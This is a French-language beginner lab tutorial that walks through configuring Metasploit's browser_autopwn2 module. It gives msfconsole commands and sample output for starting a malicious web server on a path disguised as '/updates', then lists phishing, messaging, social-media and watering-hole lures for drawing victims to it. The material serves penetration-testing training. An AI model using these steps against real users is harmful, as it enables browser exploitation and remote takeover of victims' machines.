Configurer une attaque Browser Autopwn dans Metasploit

Kali LinuxBeginner
Pratiquer maintenant

Introduction

Dans ce laboratoire, vous allez explorer l'une des fonctionnalités puissantes du Metasploit Framework : l'attaque browser autopwn. Ce type d'attaque consiste à mettre en place un serveur web malveillant qui, lorsqu'il est visité par une cible, détecte automatiquement le type et la version du navigateur de la victime, puis propose une exploitation adaptée aux vulnérabilités découvertes.

Nous utiliserons le module auxiliary/server/browser_autopwn2, une version mise à jour et plus fiable de l'original browser autopwn. Ce laboratoire vous guidera à travers le processus de sélection du module, la configuration des options nécessaires et le lancement du serveur.

Avertissement : Ce laboratoire est uniquement à des fins éducatives. Les techniques décrites ne doivent être effectuées que sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de tester.

Sélection du module auxiliary/server/browser_autopwn2

Dans cette étape, vous allez démarrer la console Metasploit Framework et sélectionner le module browser_autopwn2, qui sera le cœur de notre configuration d'attaque.

Tout d'abord, ouvrez un terminal et lancez la console Metasploit. Nous utiliserons l'option -q pour un démarrage "silencieux" (quiet), qui supprime la bannière pour une interface plus épurée.

msfconsole -q

Une fois la console chargée, vous verrez l'invite Metasploit, qui ressemble à msf6 >. Metasploit organise ses outils en modules. Pour configurer notre attaque, nous devons utiliser le module auxiliaire browser_autopwn2. Utilisez la commande use pour le sélectionner.

use auxiliary/server/browser_autopwn2

Après avoir exécuté la commande, votre invite changera pour indiquer que vous êtes maintenant dans le contexte de ce module spécifique.

msf6 > use auxiliary/server/browser_autopwn2
msf6 auxiliary(server/browser_autopwn2) >

Vous êtes maintenant prêt à configurer les options du module.

Définir l'option LHOST sur l'IP de votre Kali

Dans cette étape, vous allez configurer l'option LHOST. LHOST signifie "Local Host" (Hôte Local) et doit être défini sur l'adresse IP de votre machine attaquante (la VM LabEx). Lorsqu'une exploitation réussit, la machine de la victime se connectera à cette adresse IP, vous donnant ainsi le contrôle.

Tout d'abord, vous devez trouver l'adresse IP de votre VM LabEx. Vous pouvez ouvrir un nouvel onglet de terminal en cliquant sur l'icône + dans la fenêtre du terminal. Dans le nouveau terminal, exécutez la commande suivante pour afficher votre adresse IP :

ip addr show eth0 | grep "inet " | awk '{print $2}' | cut -d/ -f1

Vous verrez un résultat similaire à celui-ci. Assurez-vous de copier votre adresse IP spécifique.

10.0.2.15

Maintenant, retournez à votre terminal d'origine où msfconsole est en cours d'exécution. Pour voir toutes les options configurables pour le module browser_autopwn2, utilisez la commande show options.

show options

Vous verrez une liste d'options. Notez que LHOST est requis mais pas encore défini. Utilisez la commande set pour configurer LHOST avec l'adresse IP que vous venez de copier. Remplacez YOUR_IP_ADDRESS par votre adresse IP réelle.

set LHOST YOUR_IP_ADDRESS

Par exemple, si votre IP était 10.0.2.15, la commande serait :

set LHOST 10.0.2.15

Metasploit confirmera le changement.

LHOST => 10.0.2.15

Le LHOST est maintenant correctement configuré.

Définir le URIPATH pour le serveur malveillant

Dans cette étape, vous allez définir le URIPATH. Cette option définit le chemin spécifique sur votre serveur web que la victime doit visiter pour déclencher l'attaque. L'utilisation d'un chemin personnalisé et discret, différent du chemin par défaut, peut rendre l'attaque moins évidente.

Comme à l'étape précédente, vous pouvez utiliser show options pour examiner les paramètres actuels. Vous verrez que URIPATH a une valeur par défaut, mais nous allons la modifier pour quelque chose de personnalisé.

Définissons le chemin sur /updates. Cela pourrait inciter un utilisateur à penser qu'il visite une page de mise à jour logicielle. Utilisez la commande set pour modifier le URIPATH.

set URIPATH /updates

La console confirmera que le URIPATH a été mis à jour.

URIPATH => /updates

Maintenant, l'URL malveillante que la victime devrait visiter sera http://<YOUR_IP_ADDRESS>:8080/updates.

Lancer le module pour démarrer le serveur web

Dans cette étape, toutes les options nécessaires étant configurées, vous allez lancer le module auxiliaire. Cela démarrera un serveur web sur votre machine qui écoutera les connexions entrantes des victimes potentielles.

Pour lancer le module, tapez simplement run dans l'invite msfconsole et appuyez sur Entrée.

run

Metasploit va maintenant démarrer le serveur et charger toutes les exploitations de navigateur pertinentes. Vous verrez beaucoup de sorties lors de l'initialisation du serveur. Les informations clés à rechercher sont la confirmation que le serveur a démarré et l'URL qu'il utilise.

La sortie ressemblera à ceci (certains détails peuvent varier) :

[*] Auxiliary module running as a background job 0.
[*] Using URL: http://10.0.2.15:8080/updates
[*] Server started.
[*] Starting the payload handler...
[*] Analyzing browser info and matching exploits...
[*] Added exploit/windows/browser/adobe_flash_avm2...
[*] Added exploit/windows/browser/adobe_flash_copy_pixels...
... (de nombreuses autres exploitations seront listées) ...

Votre serveur malveillant est maintenant en cours d'exécution et attend activement qu'un navigateur web se connecte à http://10.0.2.15:8080/updates (avec votre IP réelle). Lorsqu'un navigateur se connectera, le serveur l'analysera et tentera de lancer une exploitation appropriée.

Discuter de la manière d'attirer une cible vers l'URL malveillante

Dans cette dernière étape, nous allons discuter de la partie la plus critique de cette attaque : amener une cible à visiter l'URL malveillante. Le serveur est en cours d'exécution, mais il est passif ; il ne peut rien faire tant qu'une victime ne navigue pas vers le lien. Cette phase repose fortement sur l'ingénierie sociale.

Étant donné que cet environnement de laboratoire n'inclut pas de machine "victime" séparée, cette étape est purement conceptuelle. Aucune commande ne doit être exécutée.

Voici quelques méthodes courantes utilisées pour livrer le lien malveillant (http://YOUR_IP_ADDRESS:8080/updates) à une cible :

  • E-mails de phishing : Envoi d'un e-mail trompeur qui encourage l'utilisateur à cliquer sur le lien. Par exemple, l'e-mail pourrait se faire passer pour une alerte de sécurité, une offre spéciale ou une notification de réinitialisation de mot de passe.
  • Messagerie instantanée : Envoi du lien directement à une cible via une application de chat, souvent avec un message comme "Hé, regarde ce site sympa !"
  • Réseaux sociaux : Publication du lien sur une plateforme de médias sociaux, soit publiquement, soit dans un message direct, pour inciter aux clics.
  • Attaque par trou d'eau (Watering Hole Attack) : Une technique plus avancée où un attaquant compromet un site web légitime que la cible fréquente. L'attaquant intègre ensuite le lien malveillant ou une redirection sur ce site.

Si une cible dotée d'un navigateur vulnérable visite votre URL, browser_autopwn2 servira automatiquement l'exploitation appropriée. Si l'exploitation réussit, une "session" sera ouverte sur votre console Metasploit, vous donnant un accès à distance à la machine de la victime. Vous verrez un message tel que [*] Session 1 opened... dans votre terminal.

Résumé

Félicitations pour avoir terminé ce laboratoire ! Vous avez appris avec succès les étapes fondamentales pour configurer une attaque de type "browser autopwn" à l'aide du Metasploit Framework.

Dans ce laboratoire, vous avez :

  • Lancé la console Metasploit.
  • Sélectionné le module auxiliary/server/browser_autopwn2.
  • Configurées les options essentielles LHOST et URIPATH.
  • Démarré le serveur web malveillant et compris son fonctionnement.
  • Discuté des techniques d'ingénierie sociale nécessaires pour attirer une cible vers l'URL malveillante.

Cet exercice démontre la puissance et l'automatisation des outils de test d'intrusion. Il souligne également l'importance cruciale de maintenir les navigateurs web et leurs plugins à jour pour se défendre contre de telles attaques. Souvenez-vous toujours d'utiliser ces connaissances de manière responsable et éthique.